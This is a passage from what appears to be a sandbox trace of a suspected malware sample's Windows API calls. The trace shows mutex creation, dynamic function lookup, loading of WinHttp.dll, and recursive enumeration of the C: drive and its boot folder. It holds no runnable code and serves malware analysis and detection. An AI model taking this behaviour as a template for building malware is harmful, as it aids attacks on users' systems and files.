xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\xdc\x58\x51\x84\xb0\xf1\x12", lpUsedDefaultChar=0x0) returned 256 [0042.727] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12f074, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0042.727] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12f074, cbMultiByte=256, lpWideCharStr=0x12e7c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0042.727] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0042.727] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchSrc=256, lpDestStr=0x12e5b8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ") returned 256 [0042.727] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ", cchWideChar=256, lpMultiByteStr=0x12ee74, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\xdc\x58\x51\x84\xb0\xf1\x12", lpUsedDefaultChar=0x0) returned 256 [0042.727] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x449910, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\1408a24b74949922cc65164eea0780449c2d02bb6123fd992b2397f1873afd21.exe.bin.exe" (normalized: "c:\\users\\eebsym5\\desktop\\1408a24b74949922cc65164eea0780449c2d02bb6123fd992b2397f1873afd21.exe.bin.exe")) returned 0x65 [0042.728] RtlInitializeSListHead (in: ListHead=0x4495c8 | out: ListHead=0x4495c8) [0042.728] GetLastError () returned 0x0 [0042.728] SetLastError (dwErrCode=0x0) [0042.728] GetEnvironmentStringsW () returned 0x280d18* [0042.728] FreeEnvironmentStringsW (penv=0x280d18) returned 1 [0042.729] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0042.729] GetProcAddress (hModule=0x76910000, lpProcName="FlsAlloc") returned 0x7696418d [0042.729] GetProcAddress (hModule=0x76910000, lpProcName="FlsFree") returned 0x76961f61 [0042.729] GetProcAddress (hModule=0x76910000, lpProcName="FlsGetValue") returned 0x76961e16 [0042.729] GetProcAddress (hModule=0x76910000, lpProcName="FlsSetValue") returned 0x769676e6 [0042.729] GetProcAddress (hModule=0x76910000, lpProcName="InitializeCriticalSectionEx") returned 0x76963879 [0042.729] GetProcAddress (hModule=0x76910000, lpProcName="InitOnceExecuteOnce") returned 0x76959601 [0042.729] GetProcAddress (hModule=0x76910000, lpProcName="CreateEventExW") returned 0x769124d8 [0042.729] GetProcAddress (hModule=0x76910000, lpProcName="CreateSemaphoreW") returned 0x7694db8b [0042.730] GetProcAddress (hModule=0x76910000, lpProcName="CreateSemaphoreExW") returned 0x76942111 [0042.730] GetProcAddress (hModule=0x76910000, lpProcName="CreateThreadpoolTimer") returned 0x7694b009 [0042.730] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadpoolTimer") returned 0x772589be [0042.730] GetProcAddress (hModule=0x76910000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x7724c02a [0042.730] GetProcAddress (hModule=0x76910000, lpProcName="CloseThreadpoolTimer") returned 0x7724c0d2 [0042.730] GetProcAddress (hModule=0x76910000, lpProcName="CreateThreadpoolWait") returned 0x76943f78 [0042.730] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadpoolWait") returned 0x77258bfb [0042.730] GetProcAddress (hModule=0x76910000, lpProcName="CloseThreadpoolWait") returned 0x7724b567 [0042.730] GetProcAddress (hModule=0x76910000, lpProcName="FlushProcessWriteBuffers") returned 0x77275998 [0042.730] GetProcAddress (hModule=0x76910000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x77242251 [0042.730] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentProcessorNumber") returned 0x772428f6 [0042.730] GetProcAddress (hModule=0x76910000, lpProcName="CreateSymbolicLinkW") returned 0x76999aa9 [0042.731] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentPackageId") returned 0x0 [0042.731] GetProcAddress (hModule=0x76910000, lpProcName="GetTickCount64") returned 0x7694eb4e [0042.731] GetProcAddress (hModule=0x76910000, lpProcName="GetFileInformationByHandleEx") returned 0x769538ad [0042.731] GetProcAddress (hModule=0x76910000, lpProcName="SetFileInformationByHandle") returned 0x76948d0f [0042.731] GetProcAddress (hModule=0x76910000, lpProcName="GetSystemTimePreciseAsFileTime") returned 0x0 [0042.731] GetProcAddress (hModule=0x76910000, lpProcName="InitializeConditionVariable") returned 0x77289981 [0042.731] GetProcAddress (hModule=0x76910000, lpProcName="WakeConditionVariable") returned 0x772d5a7b [0042.731] GetProcAddress (hModule=0x76910000, lpProcName="WakeAllConditionVariable") returned 0x772545a5 [0042.731] GetProcAddress (hModule=0x76910000, lpProcName="SleepConditionVariableCS") returned 0x769418be [0042.731] GetProcAddress (hModule=0x76910000, lpProcName="InitializeSRWLock") returned 0x77289981 [0042.731] GetProcAddress (hModule=0x76910000, lpProcName="AcquireSRWLockExclusive") returned 0x7728334e [0042.731] GetProcAddress (hModule=0x76910000, lpProcName="TryAcquireSRWLockExclusive") returned 0x77261801 [0042.731] GetProcAddress (hModule=0x76910000, lpProcName="ReleaseSRWLockExclusive") returned 0x77283324 [0042.732] GetProcAddress (hModule=0x76910000, lpProcName="SleepConditionVariableSRW") returned 0x769423f5 [0042.732] GetProcAddress (hModule=0x76910000, lpProcName="CreateThreadpoolWork") returned 0x769489f2 [0042.732] GetProcAddress (hModule=0x76910000, lpProcName="SubmitThreadpoolWork") returned 0x772426a9 [0042.732] GetProcAddress (hModule=0x76910000, lpProcName="CloseThreadpoolWork") returned 0x77242111 [0042.732] GetProcAddress (hModule=0x76910000, lpProcName="CompareStringEx") returned 0x7696ebc6 [0042.732] GetProcAddress (hModule=0x76910000, lpProcName="GetLocaleInfoEx") returned 0x769453a5 [0042.732] GetProcAddress (hModule=0x76910000, lpProcName="LCMapStringEx") returned 0x7699f72b [0042.732] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0042.732] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x40ddd5) returned 0x4056df [0042.733] GetCurrentThread () returned 0xfffffffe [0042.733] GetThreadTimes (in: hThread=0xfffffffe, lpCreationTime=0x12f1dc, lpExitTime=0x12f1e4, lpKernelTime=0x12f1e4, lpUserTime=0x12f1e4 | out: lpCreationTime=0x12f1dc, lpExitTime=0x12f1e4, lpKernelTime=0x12f1e4, lpUserTime=0x12f1e4) returned 1 [0042.733] RtlInitializeSListHead (in: ListHead=0x449678 | out: ListHead=0x449678) [0042.733] RtlInitializeConditionVariable (in: ConditionVariable=0x44a80c | out: ConditionVariable=0x44a80c) [0042.733] GetStartupInfoW (in: lpStartupInfo=0x12f1d0 | out: lpStartupInfo=0x12f1d0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\EEBsYm5\\Desktop\\1408a24b74949922cc65164eea0780449c2d02bb6123fd992b2397f1873afd21.exe.bin.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0042.733] OpenMutexW (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="hoJUpcvgHA") returned 0x0 [0042.734] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="hoJUpcvgHA") returned 0x74 [0042.734] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x44a5f8 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x0 [0042.739] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\MeGEZan.VDE" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\megezan.vde"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0042.739] GetLogicalDrives () returned 0x4 [0042.739] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0042.739] GetDiskFreeSpaceW (in: lpRootPathName="C:\\", lpSectorsPerCluster=0x0, lpBytesPerSector=0x0, lpNumberOfFreeClusters=0x0, lpTotalNumberOfClusters=0x0 | out: lpSectorsPerCluster=0x0, lpBytesPerSector=0x0, lpNumberOfFreeClusters=0x0, lpTotalNumberOfClusters=0x0) returned 1 [0042.739] LoadLibraryW (lpLibFileName="WinHttp.dll") returned 0x6fd40000 [0043.262] FindFirstFileW (in: lpFileName="c:\\\\*", lpFindFileData=0x12ec48 | out: lpFindFileData=0x12ec48) returned 0x2838e8 [0043.262] FindNextFileW (in: hFindFile=0x2838e8, lpFindFileData=0x12ec48 | out: lpFindFileData=0x12ec48) returned 1 [0043.270] GetFileAttributesExW (in: lpFileName="c:\\autoexec.bat" (normalized: "c:\\autoexec.bat"), fInfoLevelId=0x0, lpFileInformation=0x12ee9c | out: lpFileInformation=0x12ee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5cdb0de4, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0x5cdb0de4, ftLastAccessTime.dwHighDateTime=0x1ca0427, ftLastWriteTime.dwLowDateTime=0x54e43b7c, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0x18)) returned 1 [0043.277] FindNextFileW (in: hFindFile=0x2838e8, lpFindFileData=0x12ec48 | out: lpFindFileData=0x12ec48) returned 1 [0043.277] FindFirstFileW (in: lpFileName="c:\\boot\\\\*", lpFindFileData=0x12e6e8 | out: lpFindFileData=0x12e6e8) returned 0x284da0 [0043.277] FindNextFileW (in: hFindFile=0x284da0, lpFindFileData=0x12e6e8 | out: lpFindFileData=0x12e6e8) returned 1 [0043.278] FindNextFileW (in: hFindFile=0x284da0, lpFindFileData=0x12e6e8 | out: lpFindFileData=0x12e6e8) returned 1 [0043.278] FindNextFileW (in: hFindFile=0x284da0, lpFindFileData=0x12e6e8 | out: lpFindFileData=0x12e6e8) returned 1 [0043.278] GetFileAttributesExW (in: lpFileName="c:\\boot\\BCD.LOG" (normalized: "c:\\boot\\bcd.log"), fInfoLevelId=0x0, lpFileInformation=0x12e93c | out: lpFileInformation=0x12e93c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x5650d820, ftCreationTime.dwHighDateTime=0x1d2da3e, ftLastAccessTime.dwLowDateTime=0x5650d820, ftLastAccessTime.dwHighDateTime=0x1d2da3e, ftLastWriteTime.dwLowDateTime=0x5359eb50, ftLastWriteTime.dwHighDateTime=0x1d4201c, nFileSizeHigh=0x0, nFileSizeLow=0x6400)) returned 1 [0043.278] FindNextFileW (in: hFindFile=0x284da0, lpFindFileData=0x12e6e8 | out: lpFindFileData=0x12e6e8) returned 1 [0043.278] FindNextFileW (in: hFindFile=0x284da0, lpFindFileData=0x12e6e8 | out: lpFindFileData=0x12e6e8) returned 1 [0043.279] FindNextFileW (in: hFindFile=0x284da0, lpFindFileData=0x12e6e8 | out: lpFindFileData=0x12e6e8) returned 1 [0043.279] GetFileAttributesExW (in: lpFileName="c:\\boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), fInfoLevelId=0x0, lpFileInformation=0x12e93c | out: lpFileInformation=0x12e93c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x553f1a00, ftCreationTime.dwHighDateTime=0x1d2da3e, ftLastAccessTime.dwLowDateTime=0x553f1a00, ftLastAccessTime.dwHighDateTime=0x1d2da3e, ftLastWriteTime.dwLowDateTime=0x553f1a00, ftLastWriteTime.dwHighDateTime=0x1d2da3e, nFileSizeHigh=0x0, nFileSizeLow=0x10000)) returned 1 [0043.279] FindNextFileW (in: hFindFile=0x284da0, lpFindFileData=0x12e6e8 | out: lpFindFileData=0x12e6e8) returned 1 [0043.279] FindFirstFileW (in: lpFileName="c:\\boot\\cs-cz\\\\*", lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 0x285e58 [0043.297] FindNextFileW (in: hFindFile=0x285e58, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 1 [0043.297] FindNextFileW (in: hFindFile=0x285e58, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 1 [0043.297] GetFileAttributesExW (in: lpFileName="c:\\boot\\cs-cz\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x12e3dc | out: lpFileInformation=0x12e3dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x55274c40, ftCreationTime.dwHighDateTime=0x1d2da3e, ftLastAccessTime.dwLowDateTime=0xe8b85ae0, ftLastAccessTime.dwHighDateTime=0x1d2f581, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50)) returned 1 [0043.298] FindNextFileW (in: hFindFile=0x285e58, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 0 [0043.299] FindClose (in: hFindFile=0x285e58 | out: hFindFile=0x285e58) returned 1 [0043.299] FindNextFileW (in: hFindFile=0x284da0, lpFindFileData=0x12e6e8 | out: lpFindFileData=0x12e6e8) returned 1 [0043.299] FindFirstFileW (in: lpFileName="c:\\boot\\da-dk\\\\*", lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 0x285e58 [0043.299] FindNextFileW (in: hFindFile=0x285e58, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 1 [0043.299] FindNextFileW (in: hFindFile=0x285e58, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 1 [0043.299] GetFileAttributesExW (in: lpFileName="c:\\boot\\da-dk\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x12e3dc | out: lpFileInformation=0x12e3dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x55274c40, ftCreationTime.dwHighDateTime=0x1d2da3e, ftLastAccessTime.dwLowDateTime=0xe8b85ae0, ftLastAccessTime.dwHighDateTime=0x1d2f581, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640)) returned 1 [0043.340] FindNextFileW (in: hFindFile=0x285e58, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 0 [0043.340] FindClose (in: hFindFile=0x285e58 | out: hFindFile=0x285e58) returned 1 [0043.340] FindNextFileW (in: hFindFile=0x284da0, lpFindFileData=0x12e6e8 | out: lpFindFileData=0x12e6e8) returned 1 [0043.340] FindFirstFileW (in: lpFileName="c:\\boot\\de-de\\\\*", lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 0x285e58 [0043.346] FindNextFileW (in: hFindFile=0x285e58, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 1 [0043.346] FindNextFileW (in: hFindFile=0x285e58, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 1 [0043.347] GetFileAttributesExW (in: lpFileName="c:\\boot\\de-de\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x12e3dc | out: lpFileInformation=0x12e3dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5529ada0, ftCreationTime.dwHighDateTime=0x1d2da3e, ftLastAccessTime.dwLowDateTime=0xe8babc40, ftLastAccessTime.dwHighDateTime=0x1d2f581, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640)) returned 1 [0043.356] FindNextFileW (in: hFindFile=0x285e58, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 0 [0043.357] FindClose (in: hFindFile=0x285e58 | out: hFindFile=0x285e58) returned 1 [0043.357] FindNextFileW (in: hFindFile=0x284da0, lpFindFileData=0x12e6e8 | out: lpFindFileData=0x12e6e8) returned 1 [0043.357] FindFirstFileW (in: lpFileName="c:\\boot\\el-gr\\\\*", lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 0x285e58 [0043.357] FindNextFileW (in: hFindFile=0x285e58, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 1 [0043.357] FindNextFileW (in: hFindFile=0x285e58, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 1 [0043.357] GetFileAttributesExW (in: lpFileName="c:\\boot\\el-gr\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x12e3dc | out: lpFileInformation=0x12e3dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5529ada0, ftCreationTime.dwHighDateTime=0x1d2da3e, ftLastAccessTime.dwLowDateTime=0xe8babc40, ftLastAccessTime.dwHighDateTime=0x1d2f581, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250)) returned 1 [0043.358] FindNextFileW (in: hFindFile=0x285e58, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 0 [0043.358] FindClose (in: hFindFile=0x285e58 | out: hFindFile=0x285e58) returned 1 [0043.358] FindNextFileW (in: hFindFile=0x284da0, lpFindFileData=0x12e6e8 | out: lpFindFileData=0x12e6e8) returned 1 [0043.358] FindFirstFileW (in: lpFileName="c:\\boot\\en-us\\\\*", lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 0x285e58 [0043.359] FindNextFileW (in: hFindFile=0x285e58, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 1 [0043.359] FindNextFileW (in: hFindFile=0x285e58, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 1 [0043.359] GetFileAttributesExW (in: lpFileName="c:\\boot\\en-us\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x12e3dc | out: lpFileInformation=0x12e3dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5529ada0, ftCreationTime.dwHighDateTime=0x1d2da3e, ftLastAccessTime.dwLowDateTime=0xe8babc40, ftLastAccessTime.dwHighDateTime=0x1d2f581, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x14c40)) returned 1 [0043.359] FindNextFileW (in: hFindFile=0x285e58, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 1 [0043.360] GetFileAttributesExW (in: lpFileName="c:\\boot\\en-us\\memtest.exe.mui" (normalized: "c:\\boot\\en-us\\memtest.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x12e3dc | out: lpFileInformation=0x12e3dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5529ada0, ftCreationTime.dwHighDateTime=0x1d2da3e, ftLastAccessTime.dwLowDateTime=0xe8babc40, ftLastAccessTime.dwHighDateTime=0x1d2f581, ftLastWriteTime.dwLowDateTime=0x6c8f1600, 